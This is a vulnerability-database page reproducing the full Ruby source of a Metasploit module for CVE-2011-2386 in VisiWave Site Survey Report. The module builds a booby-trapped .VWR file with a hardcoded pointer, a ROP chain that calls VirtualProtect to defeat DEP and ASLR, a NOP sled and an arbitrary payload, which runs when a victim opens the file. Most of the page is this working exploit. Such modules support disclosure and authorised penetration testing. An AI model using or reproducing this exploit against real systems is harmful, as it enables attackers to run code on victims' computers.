Lucene search
K

VisiWave VWR File Parsing Vulnerability

🗓️ 23 May 2011 16:28:38Reported by mr_me <[email protected]>, TecR0c <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 13 Views

VisiWave VWR File Parsing Vulnerability allows code execution via malicious files

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-2386
23 May 201100:00
circl
Check Point Advisories
VisiWave VWR File Parsing (CVE-2011-2386)
5 Oct 201400:00
checkpoint_advisories
CVE
CVE-2011-2386
8 Jun 201110:00
cve
Cvelist
CVE-2011-2386
8 Jun 201110:00
cvelist
NVD
CVE-2011-2386
8 Jun 201110:36
nvd
OpenVAS
VisiWave Site Survey Arbitrary Code Execution Vulnerability
13 Jun 201100:00
openvas
OpenVAS
VisiWave Site Survey Arbitrary Code Execution Vulnerability
13 Jun 201100:00
openvas
Prion
Null pointer dereference
8 Jun 201110:36
prion
RedhatCVE
CVE-2011-2386
22 May 202509:51
redhatcve
Tenable Nessus
VisiWave Site Survey Report VWR File Handling Overflow
25 May 201100:00
nessus
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VisiWave VWR File Parsing Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in VisiWave's Site Survey Report application.
        When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the 'Type'
        property (valid ones include 'Properties', 'TitlePage', 'Details', 'Graph', 'Table', 'Text',
        'Image'), but if a match isn't found, the function that's supposed to handle this routine
        ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10]
        instruction.  This allows attackers to overwrite it with any arbitrary value, and results code
        execution.  A patch is available at visiwave.com; the fix is done by XORing the return value as
        null if no match is found, and then it is validated before use.

        NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a
        victim user to 'double click' the malicious VWR file and execute code.  This module was also built
        to bypass ASLR and DEP.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me <steventhomasseeley[at]gmail.com>',  # original discovery & msf exploit
          'TecR0c <roccogiovannicalvi[at]gmail.com>'  # msf exploit
        ],
      'References'     =>
        [
          [ 'CVE', '2011-2386' ],
          [ 'OSVDB', '72464'],
          [ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
          [ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],
        ],
      'Payload'        =>
        {
          'Space'       => 2000,
          'BadChars'    => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3/Windows 7 SP0',
            {
              'Offset' => 3981,         # offset to rop gadgets
              'Pointer' => 0x007AF938,  # POP R32; POP R32; POP R32; ADD ESP 50; RETN ("magic" pointer)
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-05-20',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.vwr']),
      ])
  end

  def exploit

    # Allowing nulls in our rop chain is like giving gold to midas.
    # instructions taken from the applications non aslr modules
    # libcurl.dll, VisiWaveReport.exe and blah blah
    rop_gadgets =
    [
      0x1001AFBD,  # INC EBP; PUSH ESP; POP EDI; POP ESI; POP EBP; POP EBX; RET
      0xc0fff333,  # junk
      0xc0fff333,  # junk
      0x000004cf,  # lwSize 1231 bytes
      0x100017DD,  # POP ECX; RETN
      0x10037a60,  # Writeable address from .data of libcurl.dll
      0x10011104,  # POP EDX; RETN
      0x00000040,  # RWX for VirtualProtect()
      0x10026E4D,  # MOV EAX,EDI # POP EDI # RETN
      0x10002ac6,  # RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x10022641,  # ADD EAX, 20; RETN
      0x004048B1,  # XCHG EAX,EBP
      0x1001BD3F,  # POP EAX; RETN
      0x10032048,  # IAT Address - constant pointer to VirtualProtect()
      0x1000FA4A,  # MOV EAX,DWORD PTR DS:[EAX]; RETN
      0x00657fd7,  # XCHG EAX,ESI; RETN
      0x1000af40,  # PUSHAD; RET
    ].pack("V*")

    # grab the pointer to our buffer
    pointer = [target["Pointer"]].pack("V")

    sploit = pointer  # begin life in EDX
    sploit << rand_text_alphanumeric(target["Offset"])  # massive offset
    sploit << rop_gadgets      # rop chain
    sploit << make_nops(300)   # safe landing
    sploit << payload.encoded  # profit!

    vwr_data = "FileType: SSREPORT\r\n"
    vwr_data << "Product: VisiWave Site Survey, 1.6.5 Beta\r\n"
    vwr_data << "FileVersion: 10\r\n"
    vwr_data << "Item: Global Properties\r\n"
    vwr_data << "Checked: 1\r\n"
    vwr_data << "Type: #{sploit}\r\n"
    vwr_data << "SurveyFile: C:\\Program Files\\VisiWave Site Survey\\Samples\\SampleData.vws\r\n"
    vwr_data << "FloorPlanImageReport: C:\\WINDOWS\\Web\\bullet.gif\r\n"
    vwr_data << "DefaultOrientation: 0\r\n"
    vwr_data << "Header:\r\n"
    vwr_data << "Footer:\r\n"
    vwr_data << "LeftMargin: 100\r\n"
    vwr_data << "RightMargin: 100\r\n"
    vwr_data << "TopMargin: 50\r\n"
    vwr_data << "BottomMargin: 50\r\n"
    vwr_data << "Item: #{rand_text_alpha(3)}\r\n"
    vwr_data << "Checked: 1\r\n"

    print_status("Creating '#{datastore['FILENAME']}'...")
    file_create(vwr_data)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation